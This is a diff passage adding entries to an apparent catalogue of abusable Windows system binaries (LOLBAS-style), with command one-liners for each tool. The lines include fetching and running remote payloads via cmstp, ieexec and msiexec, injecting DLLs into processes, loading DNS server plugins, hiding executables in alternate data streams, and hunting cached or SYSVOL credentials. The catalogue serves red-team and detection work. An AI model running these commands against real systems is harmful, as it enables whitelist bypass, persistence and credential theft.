* https://twitter.com/mattifestation/status/620107926288515072
|
||||
|
||||
* Full path:
|
||||
* c:\windows\system32\certutil.exe
|
||||
* c:\windows\sysWOW64\certutil.exe
|
||||
|
||||
* Notes: Thanks to Matt Graeber - @mattifestation, Moriarty - @Moriarty2016
|
||||
|
17
OSBinaries/Cmdkey.exe.md
Normal file
17
OSBinaries/Cmdkey.exe.md
Normal file
@ -0,0 +1,17 @@
|
||||
## Cmdkey.exe
|
||||
* Functions: Credentials
|
||||
```
|
||||
|
||||
cmdkey /list
|
||||
List cached credentials.
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation
|
||||
|
||||
* Full path:
|
||||
* c:\windows\system32\cmdkey.exe
|
||||
* c:\windows\sysWOW64\cmdkey.exe
|
||||
|
||||
* Notes:
|
||||
|
25
OSBinaries/Cmstp.exe.md
Normal file
25
OSBinaries/Cmstp.exe.md
Normal file
@ -0,0 +1,25 @@
|
||||
## Cmstp.exe
|
||||
* Functions: Execute, UACBypass
|
||||
```
|
||||
|
||||
cmstp.exe /ni /s c:\cmstp\CorpVPN.inf
|
||||
Silently installs a specially formatted local .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
|
||||
|
||||
cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf
|
||||
Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://twitter.com/NickTyrer/status/958450014111633408
|
||||
* https://gist.github.com/NickTyrer/bbd10d20a5bb78f64a9d13f399ea0f80
|
||||
* https://gist.github.com/api0cradle/cf36fd40fa991c3a6f7755d1810cc61e
|
||||
* https://oddvar.moe/2017/08/15/research-on-cmstp-exe/
|
||||
* https://gist.githubusercontent.com/tylerapplebaum/ae8cb38ed8314518d95b2e32a6f0d3f1/raw/3127ba7453a6f6d294cd422386cae1a5a2791d71/UACBypassCMSTP.ps1 (UAC Bypass)
|
||||
* https://github.com/hfiref0x/UACME
|
||||
|
||||
* Full path:
|
||||
* C:\Windows\system32\cmstp.exe
|
||||
* C:\Windows\sysWOW64\cmstp.exe
|
||||
|
||||
* Notes: Thanks to Oddvar Moe - @oddvarmoe, Nick Tyrer - @NickTyrer
|
||||
|
20
OSBinaries/Control.exe.md
Normal file
20
OSBinaries/Control.exe.md
Normal file
@ -0,0 +1,20 @@
|
||||
## Control.exe
|
||||
* Functions: Execute, Read ADS
|
||||
```
|
||||
|
||||
control.exe c:\windows\tasks\file.txt:evil.dll
|
||||
Execute evil.dll which is stored in an Alternate Data Stream (ADS).
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://pentestlab.blog/2017/05/24/applocker-bypass-control-panel/
|
||||
* https://www.contextis.com/resources/blog/applocker-bypass-registry-key-manipulation/
|
||||
* https://bohops.com/2018/01/23/loading-alternate-data-stream-ads-dll-cpl-binaries-to-bypass-applocker/
|
||||
* https://twitter.com/bohops/status/955659561008017409
|
||||
|
||||
* Full path:
|
||||
* C:\Windows\system32\control.exe
|
||||
* C:\Windows\sysWOW64\control.exe
|
||||
|
||||
* Notes: Thanks to Jimmy - @bohops
|
||||
|
21
OSBinaries/Csc.exe.md
Normal file
21
OSBinaries/Csc.exe.md
Normal file
@ -0,0 +1,21 @@
|
||||
## Csc.exe
|
||||
* Functions: Compile
|
||||
```
|
||||
|
||||
csc -out:My.exe File.cs
|
||||
Use CSC.EXE to compile C# code stored in File.cs and output the compiled version to My.exe.
|
||||
|
||||
csc -target:library File.cs
|
||||
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://docs.microsoft.com/en-us/dotnet/csharp/language-reference/compiler-options/command-line-building-with-csc-exe
|
||||
*
|
||||
|
||||
* Full path:
|
||||
* C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe
|
||||
* C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Csc.exe
|
||||
|
||||
* Notes: Thanks to ?
|
||||
|
18
OSBinaries/Cscript.exe.md
Normal file
18
OSBinaries/Cscript.exe.md
Normal file
@ -0,0 +1,18 @@
|
||||
## Cscript.exe
|
||||
* Functions: Execute, Read ADS
|
||||
```
|
||||
|
||||
cscript c:\ads\file.txt:script.vbs
|
||||
Use cscript.exe to exectute a Visual Basic script stored in an Alternate Data Stream (ADS).
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
|
||||
* https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
|
||||
|
||||
* Full path:
|
||||
* c:\windows\system32\cscript.exe
|
||||
* c:\windows\sysWOW64\cscript.exe
|
||||
|
||||
* Notes: Thanks to Oddvar Moe - @oddvarmoe
|
||||
|
19
OSBinaries/Dfsvc.exe.md
Normal file
19
OSBinaries/Dfsvc.exe.md
Normal file
@ -0,0 +1,19 @@
|
||||
## Dfsvc.exe
|
||||
* Functions: Execute
|
||||
```
|
||||
|
||||
Missing Example
|
||||
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf
|
||||
|
||||
* Full path:
|
||||
* C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe
|
||||
* C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe
|
||||
* C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe
|
||||
* C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe
|
||||
|
||||
* Notes: Thanks to Casey Smith - @subtee
|
||||
|
20
OSBinaries/Diskshadow.exe.md
Normal file
20
OSBinaries/Diskshadow.exe.md
Normal file
@ -0,0 +1,20 @@
|
||||
## Diskshadow.exe
|
||||
* Functions: Execute, Dump NTDS.dit
|
||||
```
|
||||
|
||||
diskshadow.exe /s c:\test\diskshadow.txt
|
||||
Execute commands using diskshadow.exe from a prepared diskshadow script.
|
||||
|
||||
diskshadow> exec calc.exe
|
||||
Execute a calc.exe using diskshadow.exe.
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/
|
||||
|
||||
* Full path:
|
||||
* c:\windows\system32\diskshadow.exe
|
||||
* c:\windows\sysWOW64\diskshadow.exe
|
||||
|
||||
* Notes: Thanks to Jimmy - @bohops
|
||||
|
26
OSBinaries/Dnscmd.exe.md
Normal file
26
OSBinaries/Dnscmd.exe.md
Normal file
@ -0,0 +1,26 @@
|
||||
## Dnscmd.exe
|
||||
* Functions: Execute
|
||||
```
|
||||
|
||||
dnscmd.exe dc1.lab.int /config /serverlevelplugindll \\192.168.0.149\dll\wtf.dll
|
||||
Adds a specially crafted DLL as a plug-in of the DNS Service.
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83
|
||||
* https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html
|
||||
* https://github.com/dim0x69/dns-exe-persistance/tree/master/dns-plugindll-vcpp
|
||||
* https://twitter.com/Hexacorn/status/994000792628719618
|
||||
* http://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html
|
||||
|
||||
* Full path:
|
||||
* c:\windows\system32\Dnscmd.exe
|
||||
* c:\windows\sysWOW64\Dnscmd.exe
|
||||
|
||||
* Notes: This command must be run on a DC by a user that is at least a member of the DnsAdmins group. See the refference links for DLL details.
|
||||
Thanks to Shay Ber - ?,
|
||||
Dimitrios Slamaris - @dim0x69,
|
||||
Nikhil SamratAshok,
|
||||
Mittal - @nikhil_mitt
|
||||
|
||||
|
32
OSBinaries/Esentutl.exe.md
Normal file
32
OSBinaries/Esentutl.exe.md
Normal file
@ -0,0 +1,32 @@
|
||||
## Esentutl.exe
|
||||
* Functions: Copy, Download, Write ADS, Read ADS
|
||||
```
|
||||
|
||||
esentutl.exe /y C:\folder\sourcefile.vbs /d C:\folder\destfile.vbs /o
|
||||
Copies the source VBS file to the destination VBS file.
|
||||
|
||||
esentutl.exe /y C:\ADS\file.exe /d c:\ADS\file.txt:file.exe /o
|
||||
Copies the source EXE to an Alternate Data Stream (ADS) of the destination file.
|
||||
|
||||
esentutl.exe /y C:\ADS\file.txt:file.exe /d c:\ADS\file.exe /o
|
||||
Copies the source Alternate Data Stream (ADS) to the destination EXE.
|
||||
|
||||
esentutl.exe /y \\82.221.113.85\webdav\file.exe /d c:\ADS\file.txt:file.exe /o
|
||||
Copies the source EXE to the destination Alternate Data Stream (ADS) of the destination file.
|
||||
|
||||
esentutl.exe /y \\82.221.113.85\webdav\file.exe /d c:\ADS\file.exe /o
|
||||
Copies the source EXE to the destination EXE file.
|
||||
|
||||
esentutl.exe /y \\live.sysinternals.com\tools\adrestore.exe /d \\otherwebdavserver\webdav\adrestore.exe /o
|
||||
Copies the source EXE to the destination EXE file
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://twitter.com/egre55/status/985994639202283520
|
||||
|
||||
* Full path:
|
||||
* c:\windows\system32\esentutl.exe
|
||||
* c:\windows\sysWOW64\esentutl.exe
|
||||
|
||||
* Notes: Thanks to egre55 - @egre55
|
||||
|
24
OSBinaries/Expand.exe.md
Normal file
24
OSBinaries/Expand.exe.md
Normal file
@ -0,0 +1,24 @@
|
||||
## Expand.exe
|
||||
* Functions: Download, Copy, Add ADS
|
||||
```
|
||||
|
||||
expand \\webdav\folder\file.bat c:\ADS\file.bat
|
||||
Copies source file to destination.
|
||||
|
||||
expand c:\ADS\file1.bat c:\ADS\file2.bat
|
||||
Copies source file to destination.
|
||||
|
||||
expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat
|
||||
Copies source file to destination Alternate Data Stream (ADS).
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://twitter.com/infosecn1nja/status/986628482858807297
|
||||
* https://twitter.com/Oddvarmoe/status/986709068759949319
|
||||
|
||||
* Full path:
|
||||
* c:\windows\system32\Expand.exe
|
||||
* c:\windows\sysWOW64\Expand.exe
|
||||
|
||||
* Notes: Thanks to Rahmat Nurfauzi - @infosecn1nja, Oddvar Moe - @oddvarmoe
|
||||
|
17
OSBinaries/Explorer.exe.md
Normal file
17
OSBinaries/Explorer.exe.md
Normal file
@ -0,0 +1,17 @@
|
||||
## Explorer.exe
|
||||
* Functions: Execute
|
||||
```
|
||||
|
||||
explorer.exe calc.exe
|
||||
Executes calc.exe as a subprocess of explorer.exe.
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://twitter.com/bohops/status/986984122563391488
|
||||
|
||||
* Full path:
|
||||
* c:\windows\explorer.exe
|
||||
* c:\windows\sysWOW64\explorer.exe
|
||||
|
||||
* Notes: Thanks to Jimmy - @bohops
|
||||
|
17
OSBinaries/Extexport.exe.md
Normal file
17
OSBinaries/Extexport.exe.md
Normal file
@ -0,0 +1,17 @@
|
||||
## Extexport.exe
|
||||
* Functions: Execute
|
||||
```
|
||||
|
||||
Extexport.exe c:\test foo bar
|
||||
Load a DLL located in the c:\\test folder with one of the following names: mozcrt19.dll, mozsqlite3.dll, or sqlite.dll
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* http://www.hexacorn.com/blog/2018/04/24/extexport-yet-another-lolbin/
|
||||
|
||||
* Full path:
|
||||
* C:\Program Files\Internet Explorer\Extexport.exe
|
||||
* C:\Program Files\Internet Explorer(x86)\Extexport.exe
|
||||
|
||||
* Notes: Thanks to Adam - @hexacorn
|
||||
|
25
OSBinaries/Extrac32.exe.md
Normal file
25
OSBinaries/Extrac32.exe.md
Normal file
@ -0,0 +1,25 @@
|
||||
## Extrac32.exe
|
||||
* Functions: Add ADS, Download
|
||||
```
|
||||
|
||||
extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
|
||||
Extracts the source CAB file into an Alternate Data Stream (ADS) of the target file.
|
||||
|
||||
extrac32 \\webdavserver\webdav\file.cab c:\ADS\file.txt:file.exe
|
||||
Extracts the source CAB file into an Alternate Data Stream (ADS) of the target file.
|
||||
|
||||
extrac32 /Y /C \\webdavserver\share\test.txt C:\folder\test.txt
|
||||
Copy the source file to the destination file and overwrite it.
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
|
||||
* https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
|
||||
* https://twitter.com/egre55/status/985994639202283520
|
||||
|
||||
* Full path:
|
||||
* c:\windows\system32\extrac32.exe
|
||||
* c:\windows\sysWOW64\extrac32.exe
|
||||
|
||||
* Notes: Thanks to Oddvar Moe - @oddvarmoe, egre55 - @egre55
|
||||
|
24
OSBinaries/Findstr.exe.md
Normal file
24
OSBinaries/Findstr.exe.md
Normal file
@ -0,0 +1,24 @@
|
||||
## Findstr.exe
|
||||
* Functions: Add ADS, Search
|
||||
```
|
||||
|
||||
findstr /V /L W3AllLov3DonaldTrump c:\ADS\file.exe > c:\ADS\file.txt:file.exe
|
||||
Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file.
|
||||
|
||||
findstr /V /L W3AllLov3DonaldTrump \\webdavserver\folder\file.exe > c:\ADS\file.txt:file.exe
|
||||
Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file.
|
||||
|
||||
findstr /S /I cpassword \\<FQDN>\sysvol\<FQDN>\policies\*.xml
|
||||
Search for stored password in Group Policy files stored on SYSVOL.
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
|
||||
* https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
|
||||
|
||||
* Full path:
|
||||
* c:\windows\system32\findstr.exe
|
||||
* c:\windows\sysWOW64\findstr.exe
|
||||
|
||||
* Notes: Thanks to Oddvar Moe - @oddvarmoe
|
||||
|
22
OSBinaries/Forfiles.exe.md
Normal file
22
OSBinaries/Forfiles.exe.md
Normal file
@ -0,0 +1,22 @@
|
||||
## Forfiles.exe
|
||||
* Functions: Execute, Read ADS
|
||||
```
|
||||
|
||||
forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe
|
||||
Executes calc.exe since there is a match for notepad.exe in the c:\\windows\\System32 folder.
|
||||
|
||||
forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe"
|
||||
Executes the evil.exe Alternate Data Stream (AD) since there is a match for notepad.exe in the c:\\windows\\system32 folder.
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://twitter.com/vector_sec/status/896049052642533376
|
||||
* https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
|
||||
* https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
|
||||
|
||||
* Full path:
|
||||
* C:\Windows\system32\forfiles.exe
|
||||
* C:\Windows\sysWOW64\forfiles.exe
|
||||
|
||||
* Notes: Thanks to Eric - @vector_sec, Oddvar Moe - @oddvarmoe
|
||||
|
22
OSBinaries/Gpscript.exe.md
Normal file
22
OSBinaries/Gpscript.exe.md
Normal file
@ -0,0 +1,22 @@
|
||||
## Gpscript.exe
|
||||
* Functions: Execute
|
||||
```
|
||||
|
||||
Gpscript /logon
|
||||
Executes logon scripts configured in Group Policy.
|
||||
|
||||
Gpscript /startup
|
||||
Executes startup scripts configured in Group Policy.
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/
|
||||
|
||||
* Full path:
|
||||
* c:\windows\system32\gpscript.exe
|
||||
* c:\windows\sysWOW64\gpscript.exe
|
||||
|
||||
* Notes: Thanks to Oddvar Moe - @oddvarmoe
|
||||
Requires administrative rights and modifications to local group policy settings.
|
||||
|
||||
|
17
OSBinaries/IEExec.exe.md
Normal file
17
OSBinaries/IEExec.exe.md
Normal file
@ -0,0 +1,17 @@
|
||||
## IEExec.exe
|
||||
* Functions: Execute
|
||||
```
|
||||
|
||||
ieexec.exe http://x.x.x.x:8080/bypass.exe
|
||||
Executes bypass.exe from the remote server.
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/
|
||||
|
||||
* Full path:
|
||||
* c:\windows\system32\ieexec.exe
|
||||
* c:\windows\sysWOW64\ieexec.exe
|
||||
|
||||
* Notes: Thanks to Casey Smith - @subtee
|
||||
|
19
OSBinaries/Ie4unit.exe.md
Normal file
19
OSBinaries/Ie4unit.exe.md
Normal file
@ -0,0 +1,19 @@
|
||||
## Ie4unit.exe
|
||||
* Functions: Execute
|
||||
```
|
||||
|
||||
ie4unit.exe -BaseSettings
|
||||
Executes commands from a specially prepared ie4uinit.inf file.
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/
|
||||
|
||||
* Full path:
|
||||
* c:\windows\system32\ie4unit.exe
|
||||
* c:\windows\sysWOW64\ie4unit.exe
|
||||
* c:\windows\system32\ieuinit.inf
|
||||
* c:\windows\sysWOW64\ieuinit.inf
|
||||
|
||||
* Notes: Thanks to Jimmy - @bohops
|
||||
|
19
OSBinaries/InfDefaultInstall.exe.md
Normal file
19
OSBinaries/InfDefaultInstall.exe.md
Normal file
@ -0,0 +1,19 @@
|
||||
## InfDefaultInstall.exe
|
||||
* Functions: Execute
|
||||
```
|
||||
|
||||
InfDefaultInstall.exe Infdefaultinstall.inf
|
||||
Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file.
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://twitter.com/KyleHanslovan/status/911997635455852544
|
||||
* https://gist.github.com/KyleHanslovan/5e0f00d331984c1fb5be32c40f3b265a
|
||||
* https://blog.conscioushacker.io/index.php/2017/10/25/evading-microsofts-autoruns/
|
||||
|
||||
* Full path:
|
||||
* c:\windows\system32\Infdefaultinstall.exe
|
||||
* c:\windows\sysWOW64\Infdefaultinstall.exe
|
||||
|
||||
* Notes: Thanks to Kyle Hanslovan - @kylehanslovan
|
||||
|
24
OSBinaries/InstallUtil.exe.md
Normal file
24
OSBinaries/InstallUtil.exe.md
Normal file
@ -0,0 +1,24 @@
|
||||
## InstallUtil.exe
|
||||
* Functions: Execute
|
||||
```
|
||||
|
||||
InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
|
||||
Execute the target .NET DLL or EXE.
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://pentestlab.blog/2017/05/08/applocker-bypass-installutil/
|
||||
* https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_12
|
||||
* http://subt0x10.blogspot.no/2017/09/banned-file-execution-via.html
|
||||
* https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/InstallUtil.md
|
||||
* https://www.blackhillsinfosec.com/powershell-without-powershell-how-to-bypass-application-whitelisting-environment-restrictions-av/
|
||||
* https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
|
||||
|
||||
* Full path:
|
||||
* C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe
|
||||
* C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe
|
||||
* C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
|
||||
* C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
|
||||
|
||||
* Notes: Thanks to Casey Smith - @subtee
|
||||
|
23
OSBinaries/Makecab.exe.md
Normal file
23
OSBinaries/Makecab.exe.md
Normal file
@ -0,0 +1,23 @@
|
||||
## Makecab.exe
|
||||
* Functions: Package, Add ADS, Download
|
||||
```
|
||||
|
||||
makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
|
||||
Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file.
|
||||
|
||||
makecab \\webdavserver\webdav\file.exe C:\Folder\file.cab
|
||||
Compresses the target file and stores it in the target file.
|
||||
|
||||
makecab \\webdavserver\webdav\file.exe C:\Folder\file.txt:file.cab
|
||||
Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file.
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
|
||||
|
||||
* Full path:
|
||||
* c:\windows\system32\makecab.exe
|
||||
* c:\windows\sysWOW64\makecab.exe
|
||||
|
||||
* Notes: Thanks to Oddvar Moe - @oddvarmoe
|
||||
|
22
OSBinaries/Mavinject.exe.md
Normal file
22
OSBinaries/Mavinject.exe.md
Normal file
@ -0,0 +1,22 @@
|
||||
## Mavinject.exe
|
||||
* Functions: Execute, Read ADS
|
||||
```
|
||||
|
||||
MavInject.exe 3110 /INJECTRUNNING c:\folder\evil.dll
|
||||
Inject evil.dll into a process with PID 3110.
|
||||
|
||||
Mavinject.exe 4172 /INJECTRUNNING "c:\ads\file.txt:file.dll"
|
||||
Inject file.dll stored as an Alternate Data Stream (ADS) into a process with PID 4172.
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://twitter.com/gN3mes1s/status/941315826107510784
|
||||
* https://twitter.com/Hexcorn/status/776122138063409152
|
||||
* https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
|
||||
|
||||
* Full path:
|
||||
* C:\Windows\System32\mavinject.exe
|
||||
* C:\Windows\SysWOW64\mavinject.exe
|
||||
|
||||
* Notes: Thanks to Giuseppe N3mes1s - @gN3mes1s, Adam - @hexacorn, Oddvar Moe - @oddvarmoe
|
||||
|
27
OSBinaries/Msbuild.exe.md
Normal file
27
OSBinaries/Msbuild.exe.md
Normal file
@ -0,0 +1,27 @@
|
||||
## Msbuild.exe
|
||||
* Functions: Execute
|
||||
```
|
||||
|
||||
msbuild.exe pshell.xml
|
||||
Build and execute a C# project stored in the target XML file.
|
||||
|
||||
msbuild.exe Msbuild.csproj
|
||||
Build and execute a C# project stored in the target CSPROJ file.
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Trusted_Developer_Utilities.md
|
||||
* https://github.com/Cn33liz/MSBuildShell
|
||||
* https://pentestlab.blog/2017/05/29/applocker-bypass-msbuild/
|
||||
* https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
|
||||
|
||||
* Full path:
|
||||
* C:\Windows\Microsoft.NET\Framework\v2.0.50727\Msbuild.exe
|
||||
* C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Msbuild.exe
|
||||
* C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe
|
||||
* C:\Windows\Microsoft.NET\Framework64\v3.5\Msbuild.exe
|
||||
* C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
|
||||
* C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Msbuild.exe
|
||||
|
||||
* Notes: Thanks to Casey Smith - @subtee, Cn33liz - @Cneelis
|
||||
|
18
OSBinaries/Msconfig.exe.md
Normal file
18
OSBinaries/Msconfig.exe.md
Normal file
@ -0,0 +1,18 @@
|
||||
## Msconfig.exe
|
||||
* Functions: Execute
|
||||
```
|
||||
|
||||
Msconfig.exe -5
|
||||
Executes command embeded in crafted c:\windows\system32\mscfgtlc.xml.
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://twitter.com/pabraeken/status/991314564896690177
|
||||
|
||||
* Full path:
|
||||
* c:\windows\system32\msconfig.exe
|
||||
|
||||
* Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
|
||||
See the Payloads folder for an example mscfgtlc.xml file.
|
||||
|
||||
|
24
OSBinaries/Msdt.exe.md
Normal file
24
OSBinaries/Msdt.exe.md
Normal file
@ -0,0 +1,24 @@
|
||||
## Msdt.exe
|
||||
* Functions: Execute
|
||||
```
|
||||
|
||||
Open .diagcab package
|
||||
|
||||
|
||||
msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE
|
||||
Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file.
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://cybersyndicates.com/2015/10/a-no-bull-guide-to-malicious-windows-trouble-shooting-packs-and-application-whitelist-bypass/
|
||||
* https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/
|
||||
* https://twitter.com/harr0ey/status/991338229952598016
|
||||
|
||||
* Full path:
|
||||
* C:\Windows\System32\Msdt.exe
|
||||
* C:\Windows\SysWOW64\Msdt.exe
|
||||
|
||||
* Notes: Thanks to:
|
||||
See the Payloads folder for an example PCW8E57.xml file.
|
||||
|
||||
|
27
OSBinaries/Msiexec.exe.md
Normal file
27
OSBinaries/Msiexec.exe.md
Normal file
@ -0,0 +1,27 @@
|
||||
## Msiexec.exe
|
||||
* Functions: Execute
|
||||
```
|
||||
|
||||
msiexec /quiet /i cmd.msi
|
||||
Installs the target .MSI file silently.
|
||||
|
||||
msiexec /q /i http://192.168.100.3/tmp/cmd.png
|
||||
Installs the target remote & renamed .MSI file silently.
|
||||
|
||||
msiexec /y "C:\folder\evil.dll"
|
||||
Calls DLLRegisterServer to register the target DLL.
|
||||
|
||||
msiexec /z "C:\folder\evil.dll"
|
||||
Calls DLLRegisterServer to un-register the target DLL.
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://pentestlab.blog/2017/06/16/applocker-bypass-msiexec/
|
||||
* https://twitter.com/PhilipTsukerman/status/992021361106268161
|
||||
|
||||
* Full path:
|
||||
* c:\windows\system32\msiexec.exe
|
||||
* c:\windows\sysWOW64\msiexec.exe
|
||||
|
||||
* Notes: Thanks to ? - @netbiosX, PhilipTsukerman - @PhilipTsukerman
|
||||
|
27
OSBinaries/Netsh.exe.md
Normal file
27
OSBinaries/Netsh.exe.md
Normal file
@ -0,0 +1,27 @@
|
||||
## Netsh.exe
|
||||
* Functions: Execute, Surveillance
|
||||
```
|
||||
|
||||
netsh.exe trace start capture=yes filemode=append persistent=yes tracefile=\\server\share\file.etl IPv4.Address=!(<IPofRemoteFileShare>)
|
||||
netsh.exe trace show status
|
||||
|
||||
Capture network traffic on remote file share.
|
||||
|
||||
netsh.exe add helper C:\Path\file.dll
|
||||
Load (execute) NetSh.exe helper DLL file.
|
||||
|
||||
netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1
|
||||
Forward traffic from the listening address and proxy to a remote system.
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Persistence/Netsh_Helper_DLL.md
|
||||
* https://attack.mitre.org/wiki/Technique/T1128
|
||||
* https://twitter.com/teemuluotio/status/990532938952527873
|
||||
|
||||
* Full path:
|
||||
* C:\Windows\System32
|
||||
* C:\Windows\SysWOW64
|
||||
|
||||
* Notes:
|
||||
|
17
OSBinaries/Nltest.exe.md
Normal file
17
OSBinaries/Nltest.exe.md
Normal file
@ -0,0 +1,17 @@
|
||||
## Nltest.exe
|
||||
* Functions: Credentials
|
||||
```
|
||||
|
||||
nltest.exe /SERVER:192.168.1.10 /QUERY
|
||||
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://twitter.com/sysopfb/status/986799053668139009
|
||||
* https://ss64.com/nt/nltest.html
|
||||
|
||||
* Full path:
|
||||
* c:\windows\system32\nltest.exe
|
||||
|
||||
* Notes: Thanks to Sysopfb - @sysopfb
|
||||
|
20
OSBinaries/Openwith.exe.md
Normal file
20
OSBinaries/Openwith.exe.md
Normal file
@ -0,0 +1,20 @@
|
||||
## Openwith.exe
|
||||
* Functions: Execute
|
||||
```
|
||||
|
||||
OpenWith.exe /c C:\test.hta
|
||||
Opens the target file with the default application.
|
||||
|
||||
OpenWith.exe /c C:\testing.msi
|
||||
Opens the target file with the default application.
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://twitter.com/harr0ey/status/991670870384021504
|
||||
|
||||
* Full path:
|
||||
* c:\windows\system32\Openwith.exe
|
||||
* c:\windows\sysWOW64\Openwith.exe
|
||||
|
||||
* Notes: Thanks to Matt harr0ey - @harr0ey
|
||||
|
25
OSBinaries/Pcalua.exe.md
Normal file
25
OSBinaries/Pcalua.exe.md
Normal file
@ -0,0 +1,25 @@
|
||||
## Pcalua.exe
|
||||
* Functions: Execute
|
||||
```
|
||||
|
||||
pcalua.exe -a calc.exe
|
||||
Open the target .EXE using the Program Compatibility Assistant.
|
||||
|
||||
pcalua.exe -a \\server\payload.dll
|
||||
Open the target .DLL file with the Program Compatibilty Assistant.
|
||||
|
||||
pcalua.exe -a C:\Windows\system32\javacpl.cpl -c Java
|
||||
Open the target .CPL file with the Program Compatibility Assistant.
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://twitter.com/KyleHanslovan/status/912659279806640128
|
||||
|
||||
* Full path:
|
||||
* c:\windows\system32\pcalua.exe
|
||||
|
||||
* Notes: Thanks to:
|
||||
fab - @0rbz_
|
||||
